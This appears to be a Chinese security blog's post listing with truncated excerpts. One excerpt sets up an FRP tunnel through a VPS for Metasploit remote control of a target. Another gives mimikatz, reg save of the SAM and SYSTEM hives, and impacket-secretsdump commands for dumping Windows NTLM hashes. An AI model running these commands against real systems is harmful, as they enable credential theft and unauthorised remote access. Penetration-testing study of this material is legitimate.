FRP内网穿透_实例
+Metasploit 实现kali端→服务器→目标机远控 公网服务器设置安全策略开放自定义tcp入站9999和7000端口建立FRP隧道并配置端口转发在公网VPS上部署FRP服务端(FRPS)FRP服务端运行在你的公网VPS上,它的作用是作为一个流量中转站,等待内网Kali的连接,并将公网上的流量转发给Kali。 下载FRP:SSH登录到VPS,下载FRP压缩包并解压12wget https://github.com/fatedier/frp/releases/download/v0.58.0/frp_0.58.0_linux_amd64.tar.gztar -zxvf frp_0.58.0_linux_amd64.tar.gz 1cd frp_0.58.0_linux_amd64 配置FRP服务端:编辑服务端配置文件 frps.toml1vim frps.toml 添加以下内容(FRP服务端将在VPS的7000端口上监听,等待内网Kali的连接) 1234bindPort = 7000auth.method = "token"auth.token...
Windows登陆密码获取
Mimikatz开启mimikatz。以管理员权限打开cmd,进入目录下1mimikatz.exe 验证1privilege::debug (如果出现以下报错:ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限) 提权至 NT AUTHORITY\SYSTEM1token::elevate 获取到NTLM的hash1lsadump::sam NTLM解密1https://www.cmd5.com hashcat获取加密哈希值1reg save hklm\sam Q:\sam.hive 获取密钥文件1reg save hklm\system Q:\system.hive 分析sam文件,提取NTLM Hash1impacket-secretsdump -sam sam.hive -system system.hive LOCAL
初来乍到 ^_^
如你所见,这是一个测试-20260427
